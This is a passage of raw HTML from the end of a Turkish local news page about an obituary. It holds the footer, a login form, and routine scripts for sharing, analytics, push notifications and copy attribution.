href="http://facebook.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a> <a href="http://twitter.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a> <a href="https://www.instagram.com/elbistaninsesi_/" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/ins-ico.png" width="32" height="32" /> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/google_circle-32.png" alt="GOOGLE PLUS"></a> <a href="http://www.elbistaninsesi.com/rss"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a> </div> </div> <div class="span4 text-center"> <div class="footer-logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="Mehmet Ali Yılmankaya 79 yaşında" /></a></div> </div> <div class="span4"> <p><center> 0 (344) 415 04 15 <br> gazete@elbistaninsesi.com <br>Kızılcaoba Mah. Kışla Cad. 19/1</center> </p> <p class="site-info glyphicons earphone">0 (344) 415 04 15</p> </div> </div> </div> <div id="footer-alt" class="row-fluid"> <div class="container center"> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="#" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div> </div> </div> </div> <div class="row-fluid"> <div class="container center"> <div class="span12 text-center"> <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p> <p><a href="http://www.haber-sistemi.com" title="Haber Scripti">Haber Scripti</a> | <a href="http://www.tebilisim.com" title="TE Bilişim" target="_blank">TE Bilişim<br> </div> </div> </div> <div id="top" class="btn btn-inverse">Yukarı Çık</div> </div> <div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Üye Girişi</h3> </div> <div class="modal-body"> <form class="form-horizontal" action="http://www.elbistaninsesi.com/index.php?m=login&rd=http%3A%2F%2Fwww.elbistaninsesi.com%2Fvefatlar%2Fmehmet-ali-yilmankaya-79-yasinda-h63233.html" method="post"> <div class="control-group"> <label class="control-label" for="inputName">Kullanıcı Adı</label> <div class="controls"> <input id="inputName" value="" name="kullanici" type="text" placeholder="Kullanıcı Adı" required> </div> </div> <div class="control-group"> <label class="control-label" for="inputPassword">Şifre</label> <div class="controls"> <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required> </div> </div> <div class="control-group"> <div class="controls"> <button type="submit" class="btn btn-info">Giriş Yap</button> </div> </div> </form> </div> <div class="modal-footer"> <a href="http://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a> <a href="http://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a> <button class="btn btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button> </div> </div> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/getshares.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.elevateZoom-3.0.8.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/system-min.js"></script> <script type="text/javascript">	new UISearch( document.getElementById( 'sb-search' ) );	$(function(){	});	$("#comment_list .text").pKisalt();	var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML;	var gsSpace = ' ';	var gsUrl = location.href;	new GetShare({ root: $(".gs-facebook"), network: "facebook", share: { }	});	new GetShare({ root: $(".gs-twitter"), network: "twitter", share: { message:gsTitle+gsSpace+gsUrl }	});	new GetShare({ root: $(".gs-google"), network: "googleplus", share: { }	});	new GetShare({ root: $(".gs-linkedin"), network: "linkedin", share: { }	});	jQuery('#anasayfayazar').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[4,4,4,4],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"off",	delay:4000,	speed:750	});	jQuery('#gununmansetleri').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[6,6,6,6],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"on",	delay:4000,	speed:750	});	$('#haber > .page-header').waypoint(function(direction) { $('#article-finished').toggleClass('hiding', direction === "up");	}, { offset: function() { return $.waypoints('viewportHeight') - $(this).height() - 750; }	});	function addLink() { var kisa_site_adi = "Elbistanın Sesi"; var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com"; var body_element = document.getElementsByTagName('body')[0]; var selection; selection = window.getSelection(); var pagelink = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi; var copytext = selection + pagelink; var newdiv = document.createElement('div'); newdiv.style.position='absolute'; newdiv.style.left='-99999px'; body_element.appendChild(newdiv); newdiv.innerHTML = copytext; selection.selectAllChildren(newdiv); window.setTimeout(function() { body_element.removeChild(newdiv); },0);	}	document.oncopy = addLink;	tebilisim('63233', 'haber', ''); </script> <!-- Google Analytics --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', analitik_ga, 'auto'); ga('send', 'pageview'); </script> <!-- End Google Analytics --> <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async='async'></script> <script> var OneSignal = window.OneSignal || [];	OneSignal.push(["init", {	appId: "51fe1034-635b-4e70-859b-1fc8dff5f28d",	autoRegister: true,	subdomainName: 'elbistaninsesi',	setDefaultNotificationUrl: 'http://www.elbistaninsesi.com/',	notifyButton: { enable: false	},	/*	welcomeNotification: { "title": "Hoş geldiniz", "message": "Bildirimlerimize üye olduğunuz teşekkür ederiz.",	},	*/ promptOptions: { actionMessage: "Sondakika haberlerimizi anında öğrenebilmek için bildirimleri kabul edin!", acceptButtonText: "ABONE OL", cancelButtonText: "İSTEMİYORUM", autoAcceptTitle: '"İzin ver" butonuna tıklayın', exampleNotificationCaption: '(istediğin zaman aboneliğini iptal edebilirsin)', } }]); </script> </body> </html> 